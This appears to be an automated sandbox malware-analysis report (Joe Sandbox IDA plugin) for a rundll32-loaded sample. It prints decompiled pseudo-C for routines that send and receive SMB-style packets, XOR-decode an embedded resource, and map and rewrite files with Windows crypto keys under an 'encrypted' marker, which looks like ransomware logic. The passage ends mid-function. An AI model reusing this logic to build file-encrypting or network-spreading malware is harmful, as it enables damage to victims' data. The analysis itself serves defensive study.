                                                                                                          • Opcode ID: 09cd2f6667f077bd00ba76c4f5e32dd8880528307eea3870b6ab3bc2658445be
                                                                                                          • Instruction ID: 1ed2fc84d14ab88084785f3d2f3e07a154adfcef51f77f9c4d7cb14b9a3e0a03
                                                                                                          • Opcode Fuzzy Hash: 09cd2f6667f077bd00ba76c4f5e32dd8880528307eea3870b6ab3bc2658445be
                                                                                                          • Instruction Fuzzy Hash: A2418F39A02254BBEB215FA9DC49EAFBF3DEFD5750F000414F901E60A0C7759A41DAA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 497 4a41ca3-4a41ccd GetProcessHeap RtlAllocateHeap 498 4a41dc7-4a41dce 497->498 499 4a41cd3-4a41ce0 GetProcessHeap HeapAlloc 497->499 500 4a41db5-4a41dc0 499->500 501 4a41ce6-4a41d2e htons send 499->501 500->498 502 4a41da5-4a41dae 501->502 503 4a41d30-4a41d45 recv 501->503 502->500 503->502 504 4a41d47-4a41d4a 503->504 504->502 507 4a41d4c-4a41d60 call 4a41c3a 504->507 507->502 510 4a41d62-4a41d66 507->510 511 4a41d6b 510->511 512 4a41d6d-4a41d81 call 4a41747 511->512 514 4a41d86-4a41d8b 512->514 514->502 515 4a41d8d-4a41d96 514->515 515->512 516 4a41d98-4a41da3 515->516 516->502 516->511
                                                                                                          C-Code - Quality: 63%
                                                                                                          			E04A41CA3(intOrPtr _a4, void** _a8, long _a12) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t34;
                                                                                                          				void* _t41;
                                                                                                          				short _t42;
                                                                                                          				char _t45;
                                                                                                          				char _t46;
                                                                                                          				void* _t47;
                                                                                                          				signed int _t48;
                                                                                                          				intOrPtr* _t56;
                                                                                                          				void* _t58;
                                                                                                          				void* _t60;
                                                                                                          				void* _t61;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t34 = RtlAllocateHeap(GetProcessHeap(), 8, 0xffff); // executed
                                                                                                          				_v16 = _t34;
                                                                                                          				if(_t34 != 0) {
                                                                                                          					_t47 = HeapAlloc(GetProcessHeap(), 8, 0x33);
                                                                                                          					if(_t47 != 0) {
                                                                                                          						_t58 =  *_a8;
                                                                                                          						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) + 1;
                                                                                                          						_t48 = 9;
                                                                                                          						_t41 = memcpy(_t47, _t58, _t48 << 2);
                                                                                                          						__imp__#9(0x2f);
                                                                                                          						 *(_t47 + 2) = _t41;
                                                                                                          						_t42 = 0xc;
                                                                                                          						 *((char*)(_t47 + 8)) = 0x72;
                                                                                                          						 *((short*)(_t47 + 0x25)) = _t42;
                                                                                                          						 *((char*)(_t47 + 0x27)) = 2;
                                                                                                          						asm("movsd");
                                                                                                          						asm("movsd");
                                                                                                          						asm("movsw");
                                                                                                          						asm("movsb");
                                                                                                          						__imp__#19(_a4, _t47, 0x33, 0); // executed
                                                                                                          						if(_t42 > 0) {
                                                                                                          							_t60 = _v16;
                                                                                                          							__imp__#16(_a4, _t60, 0xffff, 0); // executed
                                                                                                          							if(_t42 > 0) {
                                                                                                          								_t68 =  *((intOrPtr*)(_t60 + 9));
                                                                                                          								if( *((intOrPtr*)(_t60 + 9)) == 0) {
                                                                                                          									_t45 = E04A41C3A(0, _t68, _a4, _a8, _a12, _t60);
                                                                                                          									_v5 = _t45;
                                                                                                          									if(_t45 == 0) {
                                                                                                          										_v12 = _v12 & 0x00000000;
                                                                                                          										_t56 = 0x4a53478;
                                                                                                          										do {
                                                                                                          											_t61 = 0;
                                                                                                          											while(1) {
                                                                                                          												_t23 = _t61 + 0x4a534f0; // 0x4a50494
                                                                                                          												_t46 = E04A41747(_a4, _a8, _a12,  *_t56,  *_t23, _v16); // executed
                                                                                                          												_v5 = _t46;
                                                                                                          												if(_t46 != 0) {
                                                                                                          													goto L11;
                                                                                                          												}
                                                                                                          												_t61 = _t61 + 4;
                                                                                                          												if(_t61 < 0xcc) {
                                                                                                          													continue;
                                                                                                          												} else {
                                                                                                          													goto L10;
                                                                                                          												}
                                                                                                          												goto L11;
                                                                                                          											}
                                                                                                          											goto L11;
                                                                                                          											L10:
                                                                                                          											_v12 = _v12 + 4;
                                                                                                          											_t56 = _t56 + 4;
                                                                                                          										} while (_v12 < 0x78);
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						L11:
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t47);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}

















                                                                                                          0x04a41cb9
                                                                                                          0x04a41cc6
                                                                                                          0x04a41cc8
                                                                                                          0x04a41ccd
                                                                                                          0x04a41cdc
                                                                                                          0x04a41ce0
                                                                                                          0x04a41ce9
                                                                                                          0x04a41ceb
                                                                                                          0x04a41cf0
                                                                                                          0x04a41cf5
                                                                                                          0x04a41cf7
                                                                                                          0x04a41cff
                                                                                                          0x04a41d03
                                                                                                          0x04a41d04
                                                                                                          0x04a41d08
                                                                                                          0x04a41d0c
                                                                                                          0x04a41d18
                                                                                                          0x04a41d19
                                                                                                          0x04a41d1a
                                                                                                          0x04a41d1c
                                                                                                          0x04a41d26
                                                                                                          0x04a41d2e
                                                                                                          0x04a41d30
                                                                                                          0x04a41d3d
                                                                                                          0x04a41d45
                                                                                                          0x04a41d47
                                                                                                          0x04a41d4a
                                                                                                          0x04a41d56
                                                                                                          0x04a41d5b
                                                                                                          0x04a41d60
                                                                                                          0x04a41d62
                                                                                                          0x04a41d66
                                                                                                          0x04a41d6b
                                                                                                          0x04a41d6b
                                                                                                          0x04a41d6d
                                                                                                          0x04a41d70
                                                                                                          0x04a41d81
                                                                                                          0x04a41d86
                                                                                                          0x04a41d8b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41d8d
                                                                                                          0x04a41d96
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a41d96
                                                                                                          0x00000000
                                                                                                          0x04a41d98
                                                                                                          0x04a41d98
                                                                                                          0x04a41d9c
                                                                                                          0x04a41d9f
                                                                                                          0x04a41d6b
                                                                                                          0x04a41d60
                                                                                                          0x04a41d4a
                                                                                                          0x04a41d45
                                                                                                          0x04a41da5
                                                                                                          0x04a41daf
                                                                                                          0x04a41daf
                                                                                                          0x04a41dc1
                                                                                                          0x04a41dc1
                                                                                                          0x04a41dce

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04A45414,00000000,?,0BADF00D,?,?,?,?,04A4943A,?), ref: 04A41CBD
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,04A4943A,?), ref: 04A41CC6
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,04A4943A,?), ref: 04A41CD7
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A,?), ref: 04A41CDA
                                                                                                          • htons.WS2_32(0000002F), ref: 04A41CF7
                                                                                                          • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04A41D26
                                                                                                          • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04A41D3D
                                                                                                            • Part of subcall function 04A41747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04A41C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04A41783
                                                                                                            • Part of subcall function 04A41747: HeapAlloc.KERNEL32(00000000), ref: 04A4178C
                                                                                                            • Part of subcall function 04A41747: CharUpperW.USER32(00000000), ref: 04A417B2
                                                                                                            • Part of subcall function 04A41747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 04A417DA
                                                                                                            • Part of subcall function 04A41747: HeapAlloc.KERNEL32(00000000), ref: 04A417DD
                                                                                                            • Part of subcall function 04A41747: htons.WS2_32(00000082), ref: 04A41801
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04A4943A,?), ref: 04A41DA8
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A,?), ref: 04A41DAF
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04A4943A,?), ref: 04A41DBA
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A,?), ref: 04A41DC1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt$NT LM 0.12$x
                                                                                                          • API String ID: 30026595-2921605930
                                                                                                          • Opcode ID: c9f10817b0c8f41b596191784eb082e849813096aa91a71a15e4c8d9b55593f3
                                                                                                          • Instruction ID: 90b62f7a9a73f06ab177ee872bf204b2f8a725709a739b4afe1cadff7490857b
                                                                                                          • Opcode Fuzzy Hash: c9f10817b0c8f41b596191784eb082e849813096aa91a71a15e4c8d9b55593f3
                                                                                                          • Instruction Fuzzy Hash: E831CC76A00205BBFF128FA4CC48B9E7F75EFD5350F048058FA08AA191C6B6A946CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 517 4a48313-4a48334 FindResourceW 518 4a48415-4a4841a 517->518 519 4a4833a-4a48349 LoadResource 517->519 519->518 520 4a4834f-4a4835b LockResource 519->520 520->518 521 4a48361-4a48373 SizeofResource 520->521 521->518 522 4a48379-4a48393 GetProcessHeap RtlAllocateHeap 521->522 523 4a48395-4a483a9 memcpy 522->523 524 4a48413-4a48414 522->524 525 4a483b5-4a483c5 GetProcessHeap RtlAllocateHeap 523->525 526 4a483ab 523->526 524->518 528 4a48407-4a4840c GetProcessHeap 525->528 529 4a483c7-4a483dc call 4a4a790 525->529 527 4a483ad-4a483b1 526->527 527->527 530 4a483b3 527->530 528->524 532 4a483e1-4a483e3 529->532 530->525 533 4a483e5-4a483ea 532->533 534 4a483fa-4a48400 GetProcessHeap 532->534 535 4a483f1-4a483f8 533->535 536 4a483ec-4a483ef 533->536 534->528 535->528 536->535
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A48313(signed int __eax, void _a4, void* _a8) {
                                                                                                          				int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t21;
                                                                                                          				void* _t22;
                                                                                                          				long _t23;
                                                                                                          				void* _t25;
                                                                                                          				int _t27;
                                                                                                          				void* _t29;
                                                                                                          				void* _t32;
                                                                                                          				void* _t35;
                                                                                                          				void** _t39;
                                                                                                          				long _t46;
                                                                                                          				void* _t48;
                                                                                                          				struct HRSRC__* _t50;
                                                                                                          
                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                          				_t50 = FindResourceW( *0x4a57b98, __eax & 0x0000ffff, 6);
                                                                                                          				if(_t50 == 0) {
                                                                                                          					L17:
                                                                                                          					return _v12;
                                                                                                          				}
                                                                                                          				_t21 = LoadResource( *0x4a57b98, _t50);
                                                                                                          				if(_t21 == 0) {
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				_t22 = LockResource(_t21);
                                                                                                          				_v16 = _t22;
                                                                                                          				if(_t22 == 0) {
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				_t23 = SizeofResource( *0x4a57b98, _t50);
                                                                                                          				_v8 = _t23;
                                                                                                          				if(_t23 == 0) {
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				_t25 = RtlAllocateHeap(GetProcessHeap(), 0, _t23); // executed
                                                                                                          				_t48 = _t25;
                                                                                                          				if(_t48 == 0) {
                                                                                                          					L16:
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          				memcpy(_t48, _v16, _v8);
                                                                                                          				_t27 = _v8;
                                                                                                          				if(_t27 == 0) {
                                                                                                          					L9:
                                                                                                          					_t29 = RtlAllocateHeap(GetProcessHeap(), 8,  *_t48); // executed
                                                                                                          					_t39 = _a4;
                                                                                                          					 *_t39 = _t29;
                                                                                                          					if(_t29 != 0) {
                                                                                                          						_a4 =  *_t48;
                                                                                                          						_t11 = _t48 + 4; // 0x4
                                                                                                          						_t32 = E04A4A790(_t29,  &_a4, _t11, _v8 + 0xfffffffc); // executed
                                                                                                          						if(_t32 != 0) {
                                                                                                          							HeapFree(GetProcessHeap(), 0,  *_t39);
                                                                                                          						} else {
                                                                                                          							_t35 = _a8;
                                                                                                          							if(_t35 != 0) {
                                                                                                          								 *_t35 = _a4;
                                                                                                          							}
                                                                                                          							_v12 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					RtlFreeHeap(GetProcessHeap(), 0, _t48); // executed
                                                                                                          					goto L16;
                                                                                                          				}
                                                                                                          				_t46 =  *_t48;
                                                                                                          				do {
                                                                                                          					_t46 = _t46 ^ 0x000000e9;
                                                                                                          					_t27 = _t27 - 1;
                                                                                                          				} while (_t27 != 0);
                                                                                                          				 *_t48 = _t46;
                                                                                                          				goto L9;
                                                                                                          			}


















                                                                                                          0x04a48319
                                                                                                          0x04a48330
                                                                                                          0x04a48334
                                                                                                          0x04a48415
                                                                                                          0x04a4841a
                                                                                                          0x04a4841a
                                                                                                          0x04a48341
                                                                                                          0x04a48349
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48350
                                                                                                          0x04a48356
                                                                                                          0x04a4835b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48368
                                                                                                          0x04a4836e
                                                                                                          0x04a48373
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4838d
                                                                                                          0x04a4838f
                                                                                                          0x04a48393
                                                                                                          0x04a48413
                                                                                                          0x00000000
                                                                                                          0x04a48414
                                                                                                          0x04a4839c
                                                                                                          0x04a483a1
                                                                                                          0x04a483a9
                                                                                                          0x04a483b5
                                                                                                          0x04a483bc
                                                                                                          0x04a483be
                                                                                                          0x04a483c1
                                                                                                          0x04a483c5
                                                                                                          0x04a483c9
                                                                                                          0x04a483d3
                                                                                                          0x04a483dc
                                                                                                          0x04a483e3
                                                                                                          0x04a48401
                                                                                                          0x04a483e5
                                                                                                          0x04a483e5
                                                                                                          0x04a483ea
                                                                                                          0x04a483ef
                                                                                                          0x04a483ef
                                                                                                          0x04a483f1
                                                                                                          0x04a483f1
                                                                                                          0x04a483e3
                                                                                                          0x04a4840d
                                                                                                          0x00000000
                                                                                                          0x04a4840d
                                                                                                          0x04a483ab
                                                                                                          0x04a483ad
                                                                                                          0x04a483ad
                                                                                                          0x04a483b0
                                                                                                          0x04a483b0
                                                                                                          0x04a483b3
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04A4832A
                                                                                                          • LoadResource.KERNEL32(00000000), ref: 04A48341
                                                                                                          • LockResource.KERNEL32(00000000), ref: 04A48350
                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 04A48368
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04A48384
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04A4838D
                                                                                                          • memcpy.MSVCRT ref: 04A4839C
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04A483B9
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A483BC
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 04A483FE
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04A48401
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04A4840A
                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A4840D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 3010137425-3529349503
                                                                                                          • Opcode ID: 86bbb19bf8200f5e3f47b64d94f98351a367091b6f9baee10b94b434a7d1eb71
                                                                                                          • Instruction ID: a44e88e34c6f25f08f2a164e28eeeab94cb64ad3dca7f10325675f291ed5b003
                                                                                                          • Opcode Fuzzy Hash: 86bbb19bf8200f5e3f47b64d94f98351a367091b6f9baee10b94b434a7d1eb71
                                                                                                          • Instruction Fuzzy Hash: 6B315C79900215ABDB11AFA9ED58FAE7FB8EFD8350F104018F905D7280EB79E911CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 40%
                                                                                                          			E04A45BC4(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                          				void* _v8;
                                                                                                          				int _v12;
                                                                                                          				void* _v16;
                                                                                                          				int _v20;
                                                                                                          				struct _SYSTEM_INFO _v56;
                                                                                                          				void* _t43;
                                                                                                          				long _t45;
                                                                                                          				void* _t46;
                                                                                                          				intOrPtr _t49;
                                                                                                          				long _t52;
                                                                                                          				void* _t53;
                                                                                                          				long _t62;
                                                                                                          				signed int _t63;
                                                                                                          				intOrPtr _t76;
                                                                                                          				void* _t77;
                                                                                                          				void* _t80;
                                                                                                          				void* _t81;
                                                                                                          				void* _t82;
                                                                                                          
                                                                                                          				_t63 = 8;
                                                                                                          				_v56.dwOemId = 0;
                                                                                                          				memset( &(_v56.dwPageSize), 0, _t63 << 2);
                                                                                                          				_v20 = 0;
                                                                                                          				GetSystemInfo( &_v56); // executed
                                                                                                          				_t7 = _a16 + 0x44; // 0x15ff4877
                                                                                                          				_t80 =  *_t7 + 0x16;
                                                                                                          				_t76 = _a8 - _t80;
                                                                                                          				asm("sbb [ebp+0x10], ebx");
                                                                                                          				asm("adc edx, [ebp+0x10]");
                                                                                                          				asm("sbb edx, eax");
                                                                                                          				_a8 = _t76;
                                                                                                          				_t43 = E04A4A6B0(_v56.dwAllocationGranularity + _t76 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                          				asm("sbb edx, 0x0");
                                                                                                          				_t45 = E04A4A670(_t43 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                          				_t77 = _t76 - _t45;
                                                                                                          				_t62 = _t77 + _t80;
                                                                                                          				_t46 = MapViewOfFile(_a4, 6, 0, _t45, _t62); // executed
                                                                                                          				_t81 = _t46;
                                                                                                          				_v8 = _t81;
                                                                                                          				if(_t81 != 0) {
                                                                                                          					_a4 = 0;
                                                                                                          					_t49 = _a16;
                                                                                                          					_t17 = _t49 + 0x40; // 0xff0975e4
                                                                                                          					__imp__CryptDuplicateHash( *_t17, 0, 0,  &_a4);
                                                                                                          					if(_t49 != 0) {
                                                                                                          						_t82 = _t81 + _t77;
                                                                                                          						__imp__CryptHashData(_a4, _t82, 4, 0);
                                                                                                          						if(_t49 != 0) {
                                                                                                          							_t20 = _a16 + 0x44; // 0x15ff4877
                                                                                                          							_t52 =  *_t20;
                                                                                                          							_v12 = _t52;
                                                                                                          							_t53 = LocalAlloc(0x40, _t52);
                                                                                                          							_v16 = _t53;
                                                                                                          							if(_t53 != 0) {
                                                                                                          								__imp__CryptGetHashParam(_a4, 2, _t53,  &_v12, 0);
                                                                                                          								if(_t53 != 0) {
                                                                                                          									memcpy(_t82 + 4, _v16, _v12);
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsd");
                                                                                                          									asm("movsw");
                                                                                                          									_v20 = FlushViewOfFile(_v8, _t62);
                                                                                                          								}
                                                                                                          								LocalFree(_v16);
                                                                                                          							}
                                                                                                          						}
                                                                                                          						__imp__CryptDestroyHash(_a4);
                                                                                                          					}
                                                                                                          					UnmapViewOfFile(_v8);
                                                                                                          				}
                                                                                                          				return _v20;
                                                                                                          			}





















                                                                                                          0x04a45bd1
                                                                                                          0x04a45bd4
                                                                                                          0x04a45bda
                                                                                                          0x04a45be0
                                                                                                          0x04a45be3
                                                                                                          0x04a45bec
                                                                                                          0x04a45bf2
                                                                                                          0x04a45bf5
                                                                                                          0x04a45bf7
                                                                                                          0x04a45c05
                                                                                                          0x04a45c0d
                                                                                                          0x04a45c11
                                                                                                          0x04a45c14
                                                                                                          0x04a45c1e
                                                                                                          0x04a45c27
                                                                                                          0x04a45c2c
                                                                                                          0x04a45c2e
                                                                                                          0x04a45c39
                                                                                                          0x04a45c3f
                                                                                                          0x04a45c43
                                                                                                          0x04a45c48
                                                                                                          0x04a45c54
                                                                                                          0x04a45c57
                                                                                                          0x04a45c5a
                                                                                                          0x04a45c5d
                                                                                                          0x04a45c65
                                                                                                          0x04a45c6f
                                                                                                          0x04a45c75
                                                                                                          0x04a45c7d
                                                                                                          0x04a45c82
                                                                                                          0x04a45c82
                                                                                                          0x04a45c88
                                                                                                          0x04a45c8b
                                                                                                          0x04a45c91
                                                                                                          0x04a45c96
                                                                                                          0x04a45ca4
                                                                                                          0x04a45cac
                                                                                                          0x04a45cb8
                                                                                                          0x04a45ccf
                                                                                                          0x04a45cd0
                                                                                                          0x04a45cd1
                                                                                                          0x04a45cd5
                                                                                                          0x04a45cda
                                                                                                          0x04a45ce2
                                                                                                          0x04a45ce2
                                                                                                          0x04a45ce8
                                                                                                          0x04a45ce8
                                                                                                          0x04a45c96
                                                                                                          0x04a45cf1
                                                                                                          0x04a45cf1
                                                                                                          0x04a45cfa
                                                                                                          0x04a45cfa
                                                                                                          0x04a45d07

                                                                                                          APIs
                                                                                                          • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04A45E4C,?,?,00000000), ref: 04A45BE3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A45C14
                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45C39
                                                                                                          • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45C5D
                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45C75
                                                                                                          • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45C8B
                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45CA4
                                                                                                          • memcpy.MSVCRT ref: 04A45CB8
                                                                                                          • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04A45E4C,?,?), ref: 04A45CDC
                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45CE8
                                                                                                          • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45CF1
                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04A45CFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                                                          • String ID: encrypted
                                                                                                          • API String ID: 3326259677-1467498611
                                                                                                          • Opcode ID: 93e8558077bd8dcab304fe69a822ecb3df8181f03ef7932cdf59d6dd2a632c15
                                                                                                          • Instruction ID: 75829887e7ea0eb44a8d2ce50d8d8cfebca78e1ef230667fd6e0325191886ebb
                                                                                                          • Opcode Fuzzy Hash: 93e8558077bd8dcab304fe69a822ecb3df8181f03ef7932cdf59d6dd2a632c15
                                                                                                          • Instruction Fuzzy Hash: E441F9B5A00109BFEB00DF68DD44EAE7BB9FBC4744F014165FE05A7250D776AE158B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 69%
                                                                                                          			E04A45D0A(void* __edx, long _a4, intOrPtr _a8) {
                                                                                                          				void* _v8;
                                                                                                          				void* _v12;
                                                                                                          				long _v16;
                                                                                                          				char _v20;
                                                                                                          				long _v24;
                                                                                                          				void* _v28;
                                                                                                          				char _v32;
                                                                                                          				signed int _v36;
                                                                                                          				intOrPtr _v40;
                                                                                                          				signed int _v44;
                                                                                                          				int _t52;
                                                                                                          				void* _t53;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                          				void* _t57;
                                                                                                          				void* _t59;
                                                                                                          				void* _t63;
                                                                                                          				void* _t67;
                                                                                                          				signed int _t69;
                                                                                                          				void* _t70;
                                                                                                          				intOrPtr _t80;
                                                                                                          				long _t82;
                                                                                                          				intOrPtr _t89;
                                                                                                          
                                                                                                          				_t80 = _a8;
                                                                                                          				_t82 = 0;
                                                                                                          				_t52 =  &_v16;
                                                                                                          				_v20 = 0;
                                                                                                          				_v32 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				__imp__CryptDuplicateKey( *((intOrPtr*)(_t80 + 0x3c)), 0, 0, _t52);
                                                                                                          				if(_t52 == 0) {
                                                                                                          					L21:
                                                                                                          					return _t52;
                                                                                                          				}
                                                                                                          				_t53 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
                                                                                                          				_v12 = _t53;
                                                                                                          				if(_t53 == 0xffffffff) {
                                                                                                          					L18:
                                                                                                          					_t52 = CryptDestroyKey(_v16);
                                                                                                          					if(_v20 == _t82 || _v32 != _t82) {
                                                                                                          						goto L21;
                                                                                                          					} else {
                                                                                                          						return SetEvent( *(_t80 + 0x48));
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_v24 = 0;
                                                                                                          				__imp__GetFileSizeEx(_t53,  &_v44);
                                                                                                          				_t73 = _v40;
                                                                                                          				_t69 = _v44;
                                                                                                          				_a4 = 0x1000000;
                                                                                                          				_t89 = _v40;
                                                                                                          				if(_t89 <= 0 && (_t89 < 0 || _t69 < 0x1000000)) {
                                                                                                          					_v24 = 1;
                                                                                                          					_a4 = _t69;
                                                                                                          					_t67 = E04A4A6B0(_t69, _t73, 0x10, _t82);
                                                                                                          					asm("adc edx, esi");
                                                                                                          					_t69 = _t67 + 1 << 4;
                                                                                                          				}
                                                                                                          				_t56 = 0;
                                                                                                          				asm("adc edi, ecx");
                                                                                                          				_t85 =  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12;
                                                                                                          				asm("adc edi, eax");
                                                                                                          				_t57 = CreateFileMappingW(_v12, _t56, 4, 0,  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12, _t56); // executed
                                                                                                          				_v8 = _t57;
                                                                                                          				_t92 = _t57;
                                                                                                          				if(_t57 == 0) {
                                                                                                          					L17:
                                                                                                          					CloseHandle(_v12);
                                                                                                          					_t80 = _a8;
                                                                                                          					_t82 = 0;
                                                                                                          					goto L18;
                                                                                                          				}
                                                                                                          				_v36 = _v36 & 0x00000000;
